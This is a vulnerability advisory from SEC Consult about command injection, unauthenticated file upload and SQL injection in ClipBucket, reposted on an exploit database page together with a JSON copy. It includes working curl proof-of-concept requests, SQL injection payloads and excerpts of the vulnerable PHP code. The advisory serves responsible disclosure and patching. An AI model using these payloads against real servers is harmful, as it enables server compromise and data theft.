Search...

ClipBucket 4.0.0 - Release 4902 - Command Injection File Upload SQL Injection

2018-03-05T00:00:00

ID EXPLOITPACK:59245CF4E9738A53969064474F32C8B9
Type exploitpack
Reporter SEC Consult
Modified 2018-03-05T00:00:00

Description

ClipBucket 4.0.0 - Release 4902 - Command Injection File Upload SQL Injection

                                        
                                            SEC Consult Vulnerability Lab Security Advisory &lt; 20180227-0 &gt;
=======================================================================
              title: OS command injection, arbitrary file upload & SQL injection
            product: ClipBucket
 vulnerable version: &lt;4.0.0 - Release 4902
      fixed version: 4.0.0 - Release 4902
         CVE number: -
             impact: critical
           homepage: http://clipbucket.com/
              found: 2017-09-06
                 by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)
                     Wan Ikram (Office Kuala Lumpur)
                     Fikri Fadzil (Office Kuala Lumpur)
                     Jasveer Singh (Office Kuala Lumpur)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal
                     Moscow - Munich - Kuala Lumpur - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"ClipBucket is a free and open source software which helps us to create a
complete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu
in few minutes of setup. It was first created in 2007 by Arslan Hassan and his
team of developers. ClipBucket was developed as a YouTube clone but has been
upgraded with advanced features and enhancements. It uses FFMPEG for video
conversion and thumbs generation which is the most widely used application so,
users can stream it straight away using the Video JS and HTML 5 Players."

Source: https://clipbucket.com/about


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker can
fully compromise the web server which has ClipBucket installed. Potentially
sensitive data might get exposed through this attack.

Users are advised to immediately install the patched version provided by the
vendor.


Vulnerability overview/description:
-----------------------------------
1. Unauthenticated OS Command Injection
Any OS commands can be injected by an unauthenticated attacker. This is a serious
vulnerability as the chances for the system to be fully compromised is very
high. This same vulnerability can also be exploited by authenticated attackers
with normal user privileges.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded into the webserver by an unauthenticated
attacker. It is possible for an attacker to upload a script to issue operating
system commands. This same vulnerability can also be exploited by an
authenticated attacker with normal user privileges.

3. Unauthenticated Blind SQL Injection
The identified SQL injection vulnerabilities enable an attacker to execute
arbitrary SQL commands on the underlying MySQL server.


Proof of concept:
-----------------
1. Unauthenticated OS Command Injection
Without having to authenticate, an attacker can exploit this vulnerability
by manipulating the "file_name" parameter during the file upload in the script
/api/file_uploader.php:

 $ curl -F "Filedata=@pfile.jpg" -F "file_name=aa.php ||&lt;&lt;COMMAND HERE&gt;&gt;"
http://$HOST/api/file_uploader.php


Alternatively, this vulnerability can also be exploited by authenticated basic
privileged users with the following payload by exploiting the same issue in
/actions/file_downloader.php:

$ curl --cookie "[--SNIP--]" --data "file=http://localhost/vid.mp4&file_name=abc
|| &lt;&lt;COMMAND HERE&gt;&gt;" "http://$HOST/actions/file_downloader.php"


2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver with no
authentication required.

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/beats_uploader.php"

$ curl -F "file=@pfile.php" -F "plupload=1" -F "name=anyname.php"
"http://$HOST/actions/photo_uploader.php"

Furthermore, this vulnerability is also available to authenticated users with
basic privileges:

$ curl --cookie "[--SNIP--]" -F
"coverPhoto=@valid-image-with-appended-phpcode.php"
"http://$HOST/edit_account.php?mode=avatar_bg"


3. Unauthenticated Blind SQL Injection
The following parameters have been identified to be vulnerable against
unauthenticated blind SQL injection.

URL     : http://$HOST/actions/vote_channel.php
METHOD  : POST
PAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())

The source code excerpt below shows the vulnerable code
VULN. FILE : /actions/vote_channel.php
VULN. CODE :
[...]
$vote = $_POST["vote"];
$userid = $_POST["channelId"];
//if($userquery-&gt;login_check('',true)){
if($vote == "yes"){
    $query = "UPDATE " . tbl("users") . " SET voted = voted + 1, likes = likes + 1
WHERE userid = {$userid}";
}else{
    //$query = "UPDATE " . tbl("users") . " SET likes = likes (- 1) WHERE userid =
{$userid}";
    $sel = "Select userid,username,likes From ".tbl("users")." WHERE userid =
{$userid}";
    $result = $db-&gt;Execute($sel);
     foreach ($result as $row )
        $current_likes = $row['likes'];
        $decremented_like = $current_likes-1;
     $query = "Update ".tbl("users")." Set likes = $decremented_like Where userid
= $userid";
}
[...]

URL     : http://$HOST/ajax/commonAjax.php
METHOD  : POST
PAYLOAD : mode=emailExists&email=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$email = $_POST['email'];
$check = $db-&gt;select(tbl('users'),"email"," email='$email'");
if (!$check) {
    echo "NO";
}
[...]

URL     : http://$HOST/ajax/commonAjax.php
METHOD  : POST
PAYLOAD : mode=userExists&username=1' or '1'='1

The source code excerpt below shows the vulnerable code
VULN. FILE : /ajax/commonAjax.php
VULN. CODE :
[...]
$username = $_POST['username'];
$check = $db-&gt;select(tbl('users'),"username"," username='$username'");
if (!$check) {
    echo "NO";
}
[...]


Vulnerable / tested versions:
-----------------------------
Clipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were
the latest at the time the security vulnerabilities were discovered.


Vendor contact timeline:
------------------------
2017-10-17: Contacting vendor through email.
2017-10-18: Vendor asking for additional details.
2017-10-19: Replied to vendor.
2017-10-26: Request update from vendor, no response.
2017-11-09: Request update from vendor.
2017-11-09: Vendor response with security patches.
2017-11-10: Notified vendor the security patches don't fix the reported issues
2017-11-30: Request update from vendor.
2017-11-30: Vendor requesting for support via Skype
2017-12-07: Response to vendor.
2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again
2018-01-22: Vendor provides latest patches, scheduled for future release
2018-01-26: Verified that the patches don't fully mitigate all issues.
2018-01-29: Request update from vendor, no response.
2018-02-06: Request update from vendor, no response.
2018-02-08: Informing vendor of public release date
2018-02-08: Vendor: Stable v4.0 including security fixes will be released in
            two weeks; postponing once again for two weeks
2018-02-23: Request update from vendor.
2018-02-26: Vendor publishes v4.0
2018-02-27: Public release of security advisory



Solution:
---------
The vendor provided the following patched version:
https://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip


Workaround:
-----------
None


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal
Moscow - Munich - Kuala Lumpur - Singapore
Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:09", "references": [], "description": "\nClipBucket 4.0.0 - Release 4902 - Command Injection File Upload SQL Injection", "edition": 1, "reporter": "SEC Consult", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2018-03-05T00:00:00", "title": "ClipBucket 4.0.0 - Release 4902 - Command Injection File Upload SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:09", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:09", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-03-05T00:00:00", "id": "EXPLOITPACK:59245CF4E9738A53969064474F32C8B9", "href": "", "viewCount": 1, "sourceData": "SEC Consult Vulnerability Lab Security Advisory < 20180227-0 >\n=======================================================================\n title: OS command injection, arbitrary file upload & SQL injection\n product: ClipBucket\n vulnerable version: <4.0.0 - Release 4902\n fixed version: 4.0.0 - Release 4902\n CVE number: -\n impact: critical\n homepage: http://clipbucket.com/\n found: 2017-09-06\n by: Ahmad Ramadhan Amizudin (Office Kuala Lumpur)\n Wan Ikram (Office Kuala Lumpur)\n Fikri Fadzil (Office Kuala Lumpur)\n Jasveer Singh (Office Kuala Lumpur)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult\n Bangkok - Berlin - Linz - Luxembourg - Montreal\n Moscow - Munich - Kuala Lumpur - Singapore\n Vienna (HQ) - Vilnius - Zurich\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"ClipBucket is a free and open source software which helps us to create a\ncomplete video sharing website like YouTube, Dailymotion, Metacafe, Veoh, Hulu\nin few minutes of setup. It was first created in 2007 by Arslan Hassan and his\nteam of developers. ClipBucket was developed as a YouTube clone but has been\nupgraded with advanced features and enhancements. It uses FFMPEG for video\nconversion and thumbs generation which is the most widely used application so,\nusers can stream it straight away using the Video JS and HTML 5 Players.\"\n\nSource: https://clipbucket.com/about\n\n\nBusiness recommendation:\n------------------------\nBy exploiting the vulnerabilities documented in this advisory, an attacker can\nfully compromise the web server which has ClipBucket installed. Potentially\nsensitive data might get exposed through this attack.\n\nUsers are advised to immediately install the patched version provided by the\nvendor.\n\n\nVulnerability overview/description:\n-----------------------------------\n1. Unauthenticated OS Command Injection\nAny OS commands can be injected by an unauthenticated attacker. This is a serious\nvulnerability as the chances for the system to be fully compromised is very\nhigh. This same vulnerability can also be exploited by authenticated attackers\nwith normal user privileges.\n\n2. Unauthenticated Arbitrary File Upload\nA malicious file can be uploaded into the webserver by an unauthenticated\nattacker. It is possible for an attacker to upload a script to issue operating\nsystem commands. This same vulnerability can also be exploited by an\nauthenticated attacker with normal user privileges.\n\n3. Unauthenticated Blind SQL Injection\nThe identified SQL injection vulnerabilities enable an attacker to execute\narbitrary SQL commands on the underlying MySQL server.\n\n\nProof of concept:\n-----------------\n1. Unauthenticated OS Command Injection\nWithout having to authenticate, an attacker can exploit this vulnerability\nby manipulating the \"file_name\" parameter during the file upload in the script\n/api/file_uploader.php:\n\n $ curl -F \"Filedata=@pfile.jpg\" -F \"file_name=aa.php ||<<COMMAND HERE>>\"\nhttp://$HOST/api/file_uploader.php\n\n\nAlternatively, this vulnerability can also be exploited by authenticated basic\nprivileged users with the following payload by exploiting the same issue in\n/actions/file_downloader.php:\n\n$ curl --cookie \"[--SNIP--]\" --data \"file=http://localhost/vid.mp4&file_name=abc\n|| <<COMMAND HERE>>\" \"http://$HOST/actions/file_downloader.php\"\n\n\n2. Unauthenticated Arbitrary File Upload\nBelow is the cURL request to upload arbitrary files to the webserver with no\nauthentication required.\n\n$ curl -F \"file=@pfile.php\" -F \"plupload=1\" -F \"name=anyname.php\"\n\"http://$HOST/actions/beats_uploader.php\"\n\n$ curl -F \"file=@pfile.php\" -F \"plupload=1\" -F \"name=anyname.php\"\n\"http://$HOST/actions/photo_uploader.php\"\n\nFurthermore, this vulnerability is also available to authenticated users with\nbasic privileges:\n\n$ curl --cookie \"[--SNIP--]\" -F\n\"coverPhoto=@valid-image-with-appended-phpcode.php\"\n\"http://$HOST/edit_account.php?mode=avatar_bg\"\n\n\n3. Unauthenticated Blind SQL Injection\nThe following parameters have been identified to be vulnerable against\nunauthenticated blind SQL injection.\n\nURL : http://$HOST/actions/vote_channel.php\nMETHOD : POST\nPAYLOAD : channelId=channelId=1-BENCHMARK(100000000, rand())\n\nThe source code excerpt below shows the vulnerable code\nVULN. FILE : /actions/vote_channel.php\nVULN. CODE :\n[...]\n$vote = $_POST[\"vote\"];\n$userid = $_POST[\"channelId\"];\n//if($userquery->login_check('',true)){\nif($vote == \"yes\"){\n $query = \"UPDATE \" . tbl(\"users\") . \" SET voted = voted + 1, likes = likes + 1\nWHERE userid = {$userid}\";\n}else{\n //$query = \"UPDATE \" . tbl(\"users\") . \" SET likes = likes (- 1) WHERE userid =\n{$userid}\";\n $sel = \"Select userid,username,likes From \".tbl(\"users\").\" WHERE userid =\n{$userid}\";\n $result = $db->Execute($sel);\n foreach ($result as $row )\n $current_likes = $row['likes'];\n $decremented_like = $current_likes-1;\n $query = \"Update \".tbl(\"users\").\" Set likes = $decremented_like Where userid\n= $userid\";\n}\n[...]\n\nURL : http://$HOST/ajax/commonAjax.php\nMETHOD : POST\nPAYLOAD : mode=emailExists&email=1' or '1'='1\n\nThe source code excerpt below shows the vulnerable code\nVULN. FILE : /ajax/commonAjax.php\nVULN. CODE :\n[...]\n$email = $_POST['email'];\n$check = $db->select(tbl('users'),\"email\",\" email='$email'\");\nif (!$check) {\n echo \"NO\";\n}\n[...]\n\nURL : http://$HOST/ajax/commonAjax.php\nMETHOD : POST\nPAYLOAD : mode=userExists&username=1' or '1'='1\n\nThe source code excerpt below shows the vulnerable code\nVULN. FILE : /ajax/commonAjax.php\nVULN. CODE :\n[...]\n$username = $_POST['username'];\n$check = $db->select(tbl('users'),\"username\",\" username='$username'\");\nif (!$check) {\n echo \"NO\";\n}\n[...]\n\n\nVulnerable / tested versions:\n-----------------------------\nClipbucket version 2.8.3 and version 4.0.0 have been tested. These versions were\nthe latest at the time the security vulnerabilities were discovered.\n\n\nVendor contact timeline:\n------------------------\n2017-10-17: Contacting vendor through email.\n2017-10-18: Vendor asking for additional details.\n2017-10-19: Replied to vendor.\n2017-10-26: Request update from vendor, no response.\n2017-11-09: Request update from vendor.\n2017-11-09: Vendor response with security patches.\n2017-11-10: Notified vendor the security patches don't fix the reported issues\n2017-11-30: Request update from vendor.\n2017-11-30: Vendor requesting for support via Skype\n2017-12-07: Response to vendor.\n2018-01-22: Checking version 4.0.0, vulnerabilities not fixed, asking vendor again\n2018-01-22: Vendor provides latest patches, scheduled for future release\n2018-01-26: Verified that the patches don't fully mitigate all issues.\n2018-01-29: Request update from vendor, no response.\n2018-02-06: Request update from vendor, no response.\n2018-02-08: Informing vendor of public release date\n2018-02-08: Vendor: Stable v4.0 including security fixes will be released in\n two weeks; postponing once again for two weeks\n2018-02-23: Request update from vendor.\n2018-02-26: Vendor publishes v4.0\n2018-02-27: Public release of security advisory\n\n\n\nSolution:\n---------\nThe vendor provided the following patched version:\nhttps://github.com/arslancb/clipbucket/releases/download/4902/clipbucket-4902.zip\n\n\nWorkaround:\n-----------\nNone\n\n\nAdvisory URL:\n-------------\nhttps://www.sec-consult.com/en/vulnerability-lab/advisories/index.html\n\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nSEC Consult Vulnerability Lab\n\nSEC Consult\nBangkok - Berlin - Linz - Luxembourg - Montreal\nMoscow - Munich - Kuala Lumpur - Singapore\nVienna (HQ) - Vilnius - Zurich\n\nAbout SEC Consult Vulnerability Lab\nThe SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It\nensures the continued knowledge gain of SEC Consult in the field of network\nand application security to stay ahead of the attacker. The SEC Consult\nVulnerability Lab supports high-quality penetration testing and the evaluation\nof new offensive and defensive technologies for our customers. Hence our\ncustomers obtain the most current information about vulnerabilities and valid\nrecommendation about the risk profile of new technologies.\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nInterested to work with the experts of SEC Consult?\nSend us your application https://www.sec-consult.com/en/career/index.html\n\nInterested in improving your cyber security with the experts of SEC Consult?\nContact our local offices https://www.sec-consult.com/en/contact/index.html\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMail: research at sec-consult dot com\nWeb: https://www.sec-consult.com\nBlog: http://blog.sec-consult.com\nTwitter: https://twitter.com/sec_consult", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}